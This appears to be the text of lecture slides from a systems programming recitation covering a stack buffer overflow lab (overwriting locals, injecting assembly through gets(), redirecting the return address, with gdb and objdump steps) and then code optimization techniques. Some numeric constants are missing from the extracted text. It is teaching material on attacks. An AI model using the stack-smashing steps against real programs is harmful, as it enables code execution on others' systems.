Recitation 4 Outline Buffer overflow –Practical skills for Lab 3 Code optimization –Strength reduction –Common sub-expression –Loop unrolling Reminders Lab 3: due Thursday Exam1: next Tuesday Minglong Shao Office hours: Thursdays 5-6PM Wean Hall 1315
Buffer overflow: example1 void example1() { volatile int n; char buf[4]; volatile int x; n = 0x ; x = 0xdeadbeef; strcpy(buf, “abcdefg"); // ‘a’ = 0x61, ‘b’ = 0x62 buf[4] = 0xab; buf[-4] = 0xcd; } 1.n = ? x = ? 2.n = ? x = ? 3.n = ? x = ?
void example1() { volatile int n; char buf[4]; volatile int x; n = 0x ; x = 0xdeadbeef; strcpy(buf, “abcdefg"); // ‘a’ = 0x61, ‘b’ = 0x62 buf[4] = 0xab; buf[-4] = 0xcd; } Buffer overflow: example1 example1: push %ebp mov %esp,%ebp sub $0x18,%esp movl $0x ,0xfffffffc(%ebp) movl $0xdeadbeef,0xfffffff4(%ebp) sub $0x8,%esp push $0x lea 0xfffffff8(%ebp),%eax push %eax call 0x add $0x10,%esp movb $0xab,0xfffffffc(%ebp) movb $0xcd,0xfffffff4(%ebp) leave ret n is stored at %ebp-4 x is stored at %ebp-12 buf is stored at %ebp-8 Old %ebp Return addr n 0xfc 0xf8 0xf4 %ebp buf x
Breakpoint 1: before calling strcpy Old %ebp %ebp Return addr … %esp beefdead Stack frame of example1 Address high low 1.n = 0x x = 0xdeadbeef n buf x void example1() { volatile int n; char buf[4]; volatile int x; n = 0x ; x = 0xdeadbeef; strcpy(buf, “abcdefg"); // ‘a’ = 0x61, ‘b’ = 0x62 buf[4] = 0xab; buf[-4] = 0xcd; } 0xfc 0xf8 0xf4 0xe8
Breakpoint 2: after calling strcpy Old %ebp %ebp Return addr … %esp 0xfc 0xf8 0xf4 0xf beefdead Stack frame of example1 n buf x 2.n = 0x x = 0xdeadbeef void example1() { volatile int n; char buf[4]; volatile int x; n = 0x ; x = 0xdeadbeef; strcpy(buf, “abcdefg"); // ‘a’ = 0x61, ‘b’ = 0x62 buf[4] = 0xab; buf[-4] = 0xcd; } Address high low
Breakpoint 3: before return Old %ebp %ebp Return addr … %esp 0xfc 0xf8 0xf4 0xf0 66ab0067 becddead Stack frame of example1 n buf x 3.n = 0x006766ab x = 0xdeadbecd void example1() { volatile int n; char buf[4]; volatile int x; n = 0x ; x = 0xdeadbeef; strcpy(buf, “abcdefg"); // ‘a’ = 0x61, ‘b’ = 0x62 buf[4] = 0xab; buf[-4] = 0xcd; } Address high low
Old ebp Return addr Old ebp Write more characters … What if we instead strcpy(buf, "abcdefghijk"); 11+1 chars What if we instead strcpy(buf, "abcdefghijklmno"); 15+1 chars Old ebp is overwritten Return addr is overwritten Return addr … beefdead … n buf x beefdead old ebp ret addr n buf x old ebp ret addr
Put code onto stack: example2 push %ebp mov %esp,%ebp sub $0x24,%esp lea 0xffffffe8(%ebp),%eax push %eax call 0x mov $0x0,%eax leave ret int example2 () { char buf[16]; gets (buf); return 0; } Old %ebp Return addr 0xfc 0xf8 0xf4 %ebp buf 0xf0 0xec 0xe8 Old %ebp Return addr … 0xfc 0xf8 0xf4 … … … My code 0xf0 0xec 0xe8 %ebp
Steps 1.Write assembly code 2.Get binary representation of the code 3.Generate ASCII for the binary code 4.Generate string according to ASCII code 5.Run the program with the input
Write assembly code Use your favorite text editor For example, my exploit code is movl $0, -8(%ebp) addl $0x , %eax Save as *.s, e.g. input.s
Generate input string # generate binary code: input.o unix> gcc –c input.s # generate ASCII representation for the code unix> objdump –d input.o : 0: c7 45 f movl $0x0,0xfffffff8(%ebp) 7: add $0x ,%eax # put the ASCII code in a text file unix> cat > input.txt c7 45 f # generate characters according to the ASCII file unix> sendstring -f input.txt > input.raw # check whether it’s correct with “od” command unix> od -t x1 input.raw c7 45 f a
Run the program with the input unix> gdb example2 (gdb) break example2 (gdb) run < input.raw (gdb) x/16b $ebp-24 0xbffff860: 0xb8 0x87 0x16 0x40 0xc0 0x81 0x16 0x40 0xbffff868: 0x78 0xf8 0xff 0xbf 0x41 0x82 0x04 0x08 (gdb) nexti 3 # go to the inst. after “call gets” (gdb) x/16b $ebp-24 0xbffff860: 0xc7 0x45 0xf8 0x00 0x00 0x00 0x00 0x05 0xbffff868: 0x78 0x56 0x34 0x12 0x00 0x82 0x04 0x08 (gdb) disas 0xbffff860 0xbffff86c Dump of assembler code from 0xbffff860 to 0xbffff86c: 0xbffff860 movl $0x0,0xfffffff8(%ebp) 0xbffff867 add $0x ,%eax
f860bfff Buffer overflow: execute your code Execute your code: how? Overwrite return address w/ starting address of your code –Pad more chars to input string –Set last 4 bytes to the addr. Strings: c7 45 f xx xx xx xx xx xx xx xx xx xx xx xx 60 f8 ff bf –Need more code for a successful attack Old %ebp Return addr 0xfc 0xf8 0xf4 0xf0 0xec 0xe8 %ebp ab e00fd79 dfe6891c c700f … … %esp 0xdc 0xbffff860 movl $0, -8(%ebp) addl $0x , %eax movl $o_ebp, %ebp push $ret_addr ret
Assembly code example if (g_val >= 0) return g_val << 2; else return –g_val << 2; movl 0xg_val_addr,%eax testl %eax,%eax jge.L1 negl %eax.L1: sall $2,%eax ret
Security lessons learned Never trust the input you receive: use bounds- checking on all buffers –In particular, never ever use gets. Even the man page says so! gcc also warns you
Code optimization: strength reduction Turn complex operations into cheap ones. –Expensive operations: multiplication, division, modulus –Cheap operations: addition, bit operations, shifting
Strength Reduction int sum = 0; for (int i=0; i<size; i++) { sum += array[i]*2; } int sum = 0; for (int i=0; i<size; i++) { sum += array[i] << 1; } Before:... imull $2, %eax... sarl $1, %eax cycles per iteration 8.7 cycles per iteration After:
Common sub-expression #define COLS (4) void transpose(int **m, int a, int b) { int i, j, t; for(i = 0; i < COLS; ++i) { for(j = 0; j < i; ++j) { t = m[i][j]; m[i][j] = m[j][i]*a*b; m[j][i] = t*a*b; } #define COLS (4) void transpose_opt(int **m, int a, int b) { int i, j, t, c = a*b; for(i = 0; i < COLS; ++i) { for(j = 0; j < i; ++j) { t = m[i][j]; m[i][j] = m[j][i]*c; m[j][i] = t*c; } Before:After:
Loop Unrolling Reduces the loop overhead of computing the loop index and testing the loop condition Perform more data operations in each iteration Make sure to change the loop condition to not run over array bounds Take care of the final few elements one at a time
Loop Unrolling: Bubble Sort int a[7] = {5, 7, 1, 3, 8, 2, 9}; int tmp; for(i=0; i < n-1; i++) { for(j=0; j < n-1-i; j++) { if(a[j+1] < a[j]) { tmp = a[j]; a[j] = a[j+1]; a[j+1] = tmp; }
Loop Unrolling: Bubble Sort int a[7] = {5, 7, 1, 3, 8, 2, 9}; int tmp; for(i=0; i < n-1; i++) { for(j=0; j < n-3-i; j+=3) { // Unroll three times if( a[j+1] < a[j] ) { tmp = a[j]; a[j] = a[j+1]; a[j+1] = tmp; }; if( a[j+2] < a[j+1]) { tmp = a[j+1]; a[j+1] = a[j+2]; a[j+2] = tmp; };... if( a[j+3] < a[j+2]) { tmp = a[j+2]; a[j+2] = a[j+3]; a[j+3] = tmp; }; } // Finish up the remaining elements for(; j< n-1-i; j++){ if( a[j+1] < a[j] ){ tmp = a[j]; a[j] = a[j+1]; a[j+1] = tmp; }; }
Running time comparison